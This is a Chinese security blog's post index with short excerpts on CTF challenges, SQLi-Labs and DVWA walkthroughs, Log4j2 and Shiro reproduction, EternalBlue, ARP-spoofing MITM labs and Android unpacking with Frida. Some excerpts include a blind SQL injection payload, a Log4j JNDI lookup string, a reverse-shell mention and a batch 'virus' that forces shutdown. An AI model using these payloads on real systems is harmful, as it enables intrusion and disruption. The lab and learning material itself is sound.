- 博客(42)
- 收藏
- 关注
RSS订阅原创 安卓逆向-dex文件反编译【接上一篇】
下载好以后直接cmd到d2j-dex2jar.bat文件下面,把上一步脱壳生成的dex文件拖到这个路径下或者d2j-dex2jar.bat 加绝对路径。】这是一个反编译工具将dex文件反编译为jar文件,进而进行下一步,源码重现。下载好以后直接打开.exe文件把.jar文件拖进去就行了。之后使用一个界面工具jd-gui查看java代码。执行完成就可以看到jar文件了。【jd-gui下载地址】
2024-01-04 17:34:59
818
原创 安卓逆向--利用Frida框架APP脱壳
之后就可以直接利用frida-dexdump -U -p 进程号 frida-dexdump -U -n APP名字 frida-dexdump -U -f app报名 进行脱壳,之后可以在script目录下找到与APP名字对应的文件,里面就是脱壳生成的dex文件。【进行下一步前提是需要首先启动frida,并且跟模拟器连接,可以参考上一篇文章】上一篇介绍了frida的安装方式,在这里我全都用模拟器来操作。利用frida-ps -Ua可以确认当前模拟器运行的APP。【frida-dexdump下载地址】
2024-01-04 16:57:50
856
原创 移动安全APP--Frida+模拟器,模拟器+burp联动
最近测APP被通报了,问题点测得比较深,涉及到frida和burp抓包,一般在公司可能会有网络的限制,手机没办法抓包,我就直接在模拟器上试了,就在这记录一下安装过程。Frida需要python3环境的支持,在这我就不说python3的安装过程了网上也不少,或者直接和kali里面的联动一下也可以。如果是用手机的话,就下载arm64的,如果是模拟器就下载x86-64的,这块一定要注意,不然后面会报错。之后就会输入密码,然后就成功了,在模拟器中打开浏览器就可以看到burp以及可以拿到数据了。
2023-12-21 17:09:27
1634
原创 CTF攻防世界--杂项基础2
找到了RSA的私钥,那得到这个有什么用呢,看到之前我们追踪流量的时候发现有很多的文件但是看不到,那么就利用foremost分离一下。我们会发现都是一些tcp,ftp协议传输,可能会涉及文件传输的问题,通过追踪TCP数据流,看看能不能看到一些文件信息。发现一个跟flag有关的文件但是是乱码,那么就利用我们刚才得到的私钥解密这个文件。利用openssl解密,-in加密文件 -inkey密钥 -out解密后的文件。在这里能看到一些模糊的信息,有zip文件以及txt文件,继续追踪。ok,得到flag!
2023-10-07 17:18:32
223
原创 CTF--攻防世界--杂项基础
然后把他继续导入到隐写工具,发现怎么点击二维码都不够清楚,那么这就就有一个小技巧是通过截取一个相对比较清楚的二维码保存下来,继续通过隐写工具来分析,直到找到一个最清晰。一堆我不认识的,了解了才知道这种只有< > - +.类似这种符号的,是brainfuck编码,可以直接找一个在线解码工具解码。怎么又是隐写,但是我自己总结了一个小技巧就是文件都先用记事本打开,这个就能很明显的看到一个png文件头,那就把后缀换一下试试。下载题目后,想着图片隐写这些,结果最后就是直接记事本打开,作者诚不欺我,这是最简单的隐写。
2023-09-22 18:14:48
179
原创 CTF--攻防世界杂项--第二课
那么接下来就是利用分析流量包常用的工具wireshark来分析。下载题目根据文件类型可知,这是一个流量包。在最后一条数据中看到了flag。以上就结束,非常简单的一道题。
2023-09-22 16:17:34
126
原创 CTF--攻防世界-杂项入门第一课
添加一句print flag把flag输出,这里要注意一下,python2 和python3的语法问题,我是用python3编译的所以还需要再加个括号,python2不用。下载题目后拿到一张图片,确实挺迷惑的,不知从何下手,根据大家的思路都是看看有没有隐写,这里就需要用到一个很好用的工具--StegSolve。这一堆你肯定看不懂,那么就需要借助工具把这一堆十六进制编码进行转换,这里的话使用winhex工具或者一些在线的,只要能解释就行。这个下载链接,这是一个jar包,就需要提前配置好jdk环境。
2023-09-22 14:53:14
177
原创 SQLI-Labs(18-22关)请求头注入
我们用之前的方法在username 和 password的位置进行注入测试发现没有注入点,既然这道题提示你这样了,那么就可以在user-agent的后面添加一个单引号。User-agent:浏览器的身份识别字符串 【简单来说就是根据这个字段来判断是通过PC端还是手机端访问的,在一些情况下可以通过更改这个字段来看到手机端的执行效果】X-Forwarded-For:可以看到真实IP,具体原理可以百度,我之前的笔记也有关于这个字段的一些攻击利用方式。这里需要引入几个数据头信息。referer头注入。
2023-03-27 16:46:07
188
原创 堆叠注入--攻防世界CTF赛题学习
发现对关键字都进行了过滤,那么接下来想用常规思路得到数据是不可能了,就利用堆叠注入。可以确定用户输入的内容被带入到数据库中查询了,那么就可以确定这个位置有注入漏洞。在这里大家额外补充一下关于mysql中handler的知识点,我也是现查的。在这发现了flag,这里查询的时候注意一下,需要用``把表名括起来。堆叠注入的原理什么的一搜一大堆,我就不引用百度了,直接进入正题。在一次联系CTF赛题中才了解到堆叠注入,在这里简单介绍一下。接下来就是手工注入的常见思路,利用order by来猜列。
2023-03-24 16:59:41
738
1
原创 SQLI-Labs(15-17)
这两者的主要区别在于之前我们是利用id进行的注入,根据添加的SQL语句解析单引号闭合的是前面的单引号也就是当username=''时,执行后面的语句,但实际数据库并没有username=’‘的情况,但是我们利用id时,闭合成的SQL语句利用id=1,id=1实际是存在的那么才会执行后面的,所以这里的区别在于不同的参数。OK,这一关主要就是利用这个来跟大家说一下这个情况,后面的语句就套用前面的就可以了。在这里我们发现and 会报错,跟之前我们利用and爆错不一样。看到这个那么我们可以首先尝试报错或者盲注。
2023-03-13 21:01:23
135
原创 SQLI-Labs(3)8-14关【布尔盲注和时间盲注】
利用payload:' and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1【位数】,1【个数】)))=101--+那么时间盲注最大的问题就是我们没办法一开始就猜到闭合的规则,有可能试了半天他最后没有时间盲注,所以这里就考验的是心态。第十四关又是闭合的问题了。剩下的就跟之前是一样的了,在这里也不多说了,不知道的可以看之前的东西。
2023-03-05 20:50:35
411
原创 墨者靶场--报错盲注
一般在实战过程中就需要考虑各种各样的情况了,靶场这块就直接告诉你是报错盲注了就直接用吧。1' and 1=2--+ 无任何报错信息,但是可以确定我们输入的内容确实是被执行了。输入测试语句1' and 1=1--+,正常回显。这一看就是MD5加密,找一个在线工具解密。常规猜测有用的信息肯定是在member。引入一下报错注入的知识点,参考【接下来就可以用那些语句替换了。用第二个密码成功登录得到key。查出来两个密码,尝试登录。
2023-03-01 16:23:20
286
原创 DHCP部署与安全
如果服务器未响应,则在87.5%再次request,如仍然未响应,释放IP地址,发送discovery。优先级:服务器,右击,配置选项 (DNS)//如果作用域多的话不用每个都添加,直接在服务器选项里面可以全都配置了(因为情景是一个公司不同网段,所以一个DNS即可,但是网关必须单独配置)客户机毁约的两种情况(1.release,禁用,以及拔掉网线 释放IP 2.改为手动配置也是毁约,它相当于是不用服务器给你配的了)如果把服务器删了,可以还原(他只是不显示了)右击,添加服务器,浏览,高级,查找。
2023-02-27 20:54:07
2146
原创 SQLI-lab通关(1)
下面这个是单引号,这里报错大概的意思就是把原本SQL语句id=' '的单引号闭合掉了,而我们输入的内容就是引号里面的东西,我们既然闭合掉前面的了,那么后面的就单着了,而我们的payload中使用--+注释掉后面的单引号了,这里注释掉的意思就是不作为SQL语句继续执行了;那么他就会执行前面的内容。在这里前面为什么是-1,而不是1呢,我们得保证前面查询出来的是错误的结果,因为前面是正确的内容会一直显示正确的东西就不会执行后面的了,因为你后面的在数据库中根本没有,你只有前面是错的了,最终才会报错。
2023-02-22 22:24:50
197
1
原创 Shiro命令执行漏洞--漏洞探测
直接去github上下载一个叫shiroexploit的工具,网上也有很多其他的工具,自己去找吧。shiro就是一个框架,具体是啥大家可以自行百度百科,我就不再赘述了。这块一个友情提示啊,网上找的这些exe工具都放在虚拟机里啊。直接把靶场IP加端口的url地址放在地址栏里。利用vulfocus靶场进行测试,链接。这个工具需要一个java 1.8的环境。最后看到这个结果证明存在漏洞。
2023-02-01 22:01:32
359
原创 Log4j2漏洞利用
升级到最新的安全版本:log4j2-2.15.0-rc2。选用JNDI注入工具:JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar。这里的命令是想要靶机运行的命令,-A 后放的是发出攻击的电脑的IP,也是存放-C后”命令”的IP地址。【我直接下载连接失败,就下载好了以后拉进来的,如果是直接下载的去对应目录下面找】在漏洞已存在的情况下,构造攻击payload执行命令反弹shell。监听界面出现反弹shell成功的界面:(进入了交互模式)实现反弹shell,可以使用命令。
2022-12-30 16:54:20
770
原创 Log4j2漏洞复现
解析到ldap,就会去192.168.61.129:1099的ldap服务找名为shell的资源,如果找不到就会去http服务中找,在http服务中找到shell之后,就会将资源信息返回给应用程序的log4j组件,而log4j组件就会下载下来,然后发现shell是一个.class文件,就会去执行里面的代码,从而实现注入。以上就是极其简单的复现过程,没什么技术含量一分钟基本就完事了,重点是利用,下一篇我再更新。构造payload${jndi:ldap://eiumdj.dnslog.cn}
2022-12-30 15:35:24
214
原创 Wireshark的基本使用
Wireshark(前称Ethereal)是一个网络封包分析软件。网络封包分析软件的功能是截取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。在过去,网络封包分析软件是非常昂贵的,或是专门属于盈利用的软件。Ethereal的出现改变了这一切。在GNUGPL通用许可证的保障范围底下,使用者可以以免费的途径取得软件与其源代码,并拥有针对其源代码修改及客制化的权利。Ethereal是全世界最广泛的网络封包分析软件之一。内容参考百度Wires
2022-06-15 16:02:04
2240
原创 DC系列靶机渗透之DC-5
确定DC-5 IP地址如上图所示 利用nmap查看开放的端口利用80端口访问,我们发现在contact下面有一个留言板功能。那么,我们就利用这个入口进行渗透。 我们利用xss漏洞验证来进行检测,发现没有任何反应,但是我们提交之后发现底部的内容会改变。接下来,我们利用工具来扫描以下这个网站的敏感文件和目录。就需要用到dirsearch在使用之前记得下载。 扫描完成如上图所示。 我们把每个页面访问一下,知道了footer.php就是有问题的页面,每刷新一次都会改变。 而根据之前存储信息得到的信息可知,这个页面
2022-06-10 17:13:30
651
原创 DC系列靶机渗透之DC-4
打开靶机,扫描IP地址,确定IP地址以后,利用nmap扫描开放的服务。 如上图可知打开了80,22端口,那么我们访问一下。 利用80端口发现了网站登录页面。接下来,我们需要用到用户名和密码。在kali中有一款爆破密码的工具john中有一套密码字典,那么我们就利用这个密码字典进行爆破。 把文件复制到一个路径下面。接下来就需要用到burp爆破。我的burp是安装在主机,那么就需要设置一下。 在IP栏选择一个地址,记住不要选127.0.0.1因为那个是本机的地址,随便选择一个自己喜欢的,填写一个没有被占用的端口
2022-06-10 08:03:43
397
原创 DC系列靶机渗透之DC-3
利用arp -scan -l扫描主机然后利用nmap查看开放的端口,如上图所示,80端口开放,那么接下来我们可以利用这个信息进行渗透访问一下80端口得到如上图所示的信息。然后使用whatweb对网站进行扫描,得到如下信息,可以知道网站是利用joomla部署的,那么我们就可以利用joomscan扫描 利用扫描工具扫出了网站后台,我们利用浏览器登录 如上图所示。我们在上述扫描结果中,能够看出来使用的joomla版本,接下来我们就可以利用msf查找漏洞 我们发现存在sql注入漏洞根据提示的路径,我们查看文件内容如
2022-06-08 14:38:51
367
原创 DC系列靶机渗透之DC-2
利用nmap -sV 192.168.196.146可以查看开放的服务,我们发现80端口打开,通过浏览器访问,如下图 我们发现不能访问,那么这个时候我们就要考虑是不是DNS解析域名出问题了,我们查看hsots文件,然后添加IP以及域名就可以。【这个具体的原理不清楚的同学可以去学习DNS协议】 之后我们进入浏览器再次访问就成功了。 提示我们需要用到cewl爬虫 cewl是kali的一个工具,可以用来爬虫获取密码字典。然后,我们可以找到密码字典这个文件。知道了密码我们还需要知道用户名。 利用wpscan工具来枚
2022-06-07 17:57:02
472
原创 DC系列靶机渗透之DC-1
目录DC-1安装DC-1渗透过程下载完成之后解压。 修改为NAT模式。 安装好,打开之后是这个。利用arp-scan -l列出当前局域网中的设备,然后返回DC-1中查看MAC地址就可以知道靶机的IP地址。如下图所示。 还可以利用nmap来扫描 首先得知道kali的网段,然后利用网段进行扫描,相对于上面这个更加麻烦一点。 扫描出地址之后,扫描开放的服务使用nmap -sV或者nmap -A 我们经过扫描之后发现22以及80端口开放,80是http服务,22是ssh服务,因为还不知道dc靶机的用户所以不能用
2022-06-07 09:28:15
185
原创 cookie与session
目录客户端的cookie服务器端的session客户端的cookie因为http协议是无状态的,得多次输入用户名密码,保持会话不用多次输入,从响应头里面给用户发一个身份标志。服务端可以给客户端发很多个。特点:是明文的,可以任意修改,大小受限。用途:保持会话,记住登录状态(长时间不用输入密码),跟踪用户行为(记录浏览量,访问历史,进行广告推送)。有些网站对于cookie会询问用户是否使用cookie。(国内网站很少)包含cookie过期时间,以秒来计时,domain代表
2022-05-05 09:50:51
115
原创 最简单的病毒与脚本
目录最简单的病毒制作(一)最简单的病毒制作(二)最简单的脚本最简单的死循环脚本最简单的病毒制作(一)新建文本文档2.输入:shutdown -s -t 600 //600秒之后开始关机Shutdown -a 取消上一句命令在工具中去掉隐藏已知文件类型的扩展名有的人可能没有找到,在我的电脑中打开一个文件,在上面菜单栏会有,没有的是因为你没有打开菜单栏。把勾去掉。把txt改成bat双击文档即可。将这..
2022-05-05 09:45:15
1913
原创 永恒之蓝的简单介绍以及利用
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。msf是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。进入管理员模式。msfdb init 初始化数据库。启动meta...
2022-05-02 13:24:41
1167
原创 记一次利用kali和win xp以及win server2003进行模拟中间人攻击
目录攻击原理:环境搭建开启ARP欺骗利用kali系统模拟攻击者,利用中间人的攻击手段来获取用户登录的用户名与密码。前期准备: win xp (模拟用户机) winserver 2003(模拟web及ftp服务器) kali(模拟攻击者)交换机是根据帧头MAC地址进行转发的【mac地址表是自动形成的】交换机只检查帧头攻击原理:利用ARP协议【网络层协议】漏洞 已知IP解析MAC地址 ARP协议原理: (1)发送ARP广播请求 ...
2022-05-01 17:50:14
525
原创 WEB服务器以及FTP服务器相关介绍以及简单部署
目录WEB服务器和FTP服务器 部署WEB服务器:WEB服务器和FTP服务器WEB服务器:1.也称为网页服务器或HTTP服务器2.使用HTTP协议或HTTPS3.HTTP协议端口号:TCP 80HTTPS协议端口号:TCP 4434.WEB服务器发布软件:微软:IIS(Internet information service)可以发布web网站和FTP站点Linux:Apache/LAMP/Tomcat/nginx等第三方...
2022-05-01 17:34:56
1698
原创 Linux系统的基本操作(一)
目录操作系统的初步使用目录结构快捷键的应用Linux 系统中如何分辨文件类型增删改查命令压缩和解压缩如何对目录进行打包压缩vi编辑器【升级版vim编辑器】linux操作系统软件安装源码包:封装后的软件包yum源linux操作系统中的用户分类用户的分类和组创建用户组以及用户权限:操作系统的初步使用在接触一个操作系统时,我们首先需要了解的就是他的硬盘大小,CPU型号等接下来就给大家介绍一下如何通过命令查看这些信息。
2022-04-30 09:18:34
552
原创 代码审计之JAVA代码审计洞态IAST系统以及SecExample靶场
目录2 JAVA系列代码审计2.1 工具介绍2.2 SecExample靶场安装2.3 洞态IAST安装2.3 洞态IAST使用2 JAVA系列代码审计之前我们都是采用代码审计工具对PHP代码进行审计,但是在实际的工作中对于从事代码审计的人员来说JAVA的代码审计也是必不可少的,那么接下来我会详细介绍一下JAVA代码审计的流程,供大家参考学习。2.1 工具介绍在接下来的操作中,我主要是利用洞态IAST以及Secexample靶场来完成对JAVA..
2022-04-21 14:34:35
5876
4
原创 代码审计工具之Fortify安装以及初步使用
目录1 FortifyFortify工具介绍1 FortifyFortify工具介绍Fortify SCA 是一个静态的、白盒的软件源代码安全测试工具。它通过内置的五大主要分析引擎:数据流、语义、结构、控制流、配置流等对应用软件的源代码进行静态的分析,分析的过程中与它特有的软件安全漏洞规则集进行全面地匹配、查找,从而将源代码中存在的安全漏洞扫描出来,并给予整理报告。安全编码规则中的规则分析受支持语言的核心和扩展的API包中的函数,并将分析结果记录在Fortify ..
2022-04-21 14:22:30
22150
8
原创 利用win xp 以及 win server 2003部署DHCP服务器详细过程
首先准备两台虚拟机(一台windows xp,widows server 2003),模拟客户机,服务器。设置桥接模式把两台虚拟机都链接VMnet2网卡(如上图所示)首先打开windows xp进行如下操作在一台客户机中右击网上邻居选择属性,右击本地连接选择属性,点击Internet协议,如上图所示。(希望大家能看懂)看到最后一个屏幕当中可以看到自动获取IP地址点击本地连接查看状态,点开支持,啥也没,也没有全球统一无效地址。(因为这台我们是模拟客户机,需要..
2022-04-21 11:38:12
2678
原创 代码审计工具学习之Seay(安装以及初步认识)
目录1.1名词解释1.2代码审计的重要性1.3代码审计的步骤1.4代码审计的内容1.5常见的代码审计工具2 Seay2.1什么是Seay2.2Seay的安装过程3典型漏洞分析3.1什么是命令注入漏洞3.2 如何理解命令注入漏洞3.3 如何防御命令注入漏洞4 利用工具对命令注入漏洞进行分析4.1DVWA靶场命令注入漏洞分析4.2 Pikachu靶场命令注入漏洞分析1.1名词解释软件代码审计是对编程项目中源代码的全面...
2022-04-18 09:33:06
15631
原创 WEB漏扫工具使用之AWVS
在开始之前首先严肃声明,漏扫已经算是渗透的一部分了,大家谨慎使用,一定要使用授权的网站进行扫描或者可以自己搭建环境测试。工具介绍:Acunetix Web Vulnerability Scanner(简称AWVS)是一款知名的Web网络漏洞扫描工具,它通过网络爬虫测试你的网站安全,检测流行安全漏洞。它包含有收费和免费两种版本,AWVS官方网站是:http://www.acunetix.com/,官方下载地址:Download Acunetix v14 | Acunetix是一个自动化的web应用
2022-04-06 11:44:14
4197
3
原创 目标扫描之Nmap的简单使用过程
目录Nmap基本操作:目标选择:读取文件:端口扫描技术:脚本扫描:常用扫描:基本协议:IP协议:TCP协议:ICMP协议:Nmap(安装过程在另一片笔记中有介绍,当然安装过kali的就不用担心这些工具kali中都有集成)简单说明就是在官网(Nmap: the Network Mapper - Free Security Scanner)下载安装,没有任何多余的配置。Nmap是安全渗透领域最强大的开源端口扫描器,能跨平台支持运行。..
2022-04-05 11:26:32
1508
原创 代码审计工具学习之RISP(安装以及初步操作)
1 代码审计1.1名词解释代码审计(Code audit)是一种以发现程序错误,安全漏洞和违反程序规范为目标的源代码分析。软件代码审计是对编程项目中源代码的全面分析,旨在发现错误,安全漏洞或违反编程约定。 它是防御性编程范例的一个组成部分,它试图在软件发布之前减少错误。 C和C ++源代码是最常见的审计代码,因为许多高级语言(如Python)具有较少的潜在易受攻击的功能(例如,不检查边界的函数)。顾名思义就是检查源代码中的安全缺陷,检查程序源代码是否存在安全隐患,或者有编码不规范的地方,通过..
2022-04-05 11:06:43
8320
原创 Nmap安装过程
什么是nmap:Nmap是安全渗透领域最强大的开源端口扫描器,能跨平台支持运行。nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。正如大多数被用于网络安全的工具,nmap 也是不少黑客及骇客(又称脚本小子)爱用的工具 。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的
2022-03-29 10:48:11
315
原创 网络安全之web信息搜集
涉及搜索引擎,网站扫描,域名遍历以及指纹识别等操作。Google hacking名词解释:Google Hacking 是利用谷歌搜索的强大,来在浩瀚的互联网中搜索到我们需要的信息。轻量级的搜索可以搜素出一些遗留后门,不想被发现的后台入口,中量级的搜索出一些用户信息泄露,源代码泄露,未授权访问等等,重量级的则可能是mdb文件下载,CMS 未被锁定install页面,网站配置密码,php远程文件包含漏洞等重要信息。现在并不是这种攻击手法并不是特指google浏览器,大部分浏览器都可以支持googl
2022-03-28 14:37:26
4352
原创 DVWA全级别通关教程
首先选择难度,我们从low开始,如上图所示进行修改目录SQL手工注入过程:lowMediumhighImpossibleSQL 盲注过程:SQL 工具注入工具安装过程:过程:lowMediumHigh:暴力破解过程:LowMediumHighImpossible命令注入过程:LowMediumHigh:Impossible文件上传过程:LowMediumHighIm...
2022-03-26 13:29:13
85829
16
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人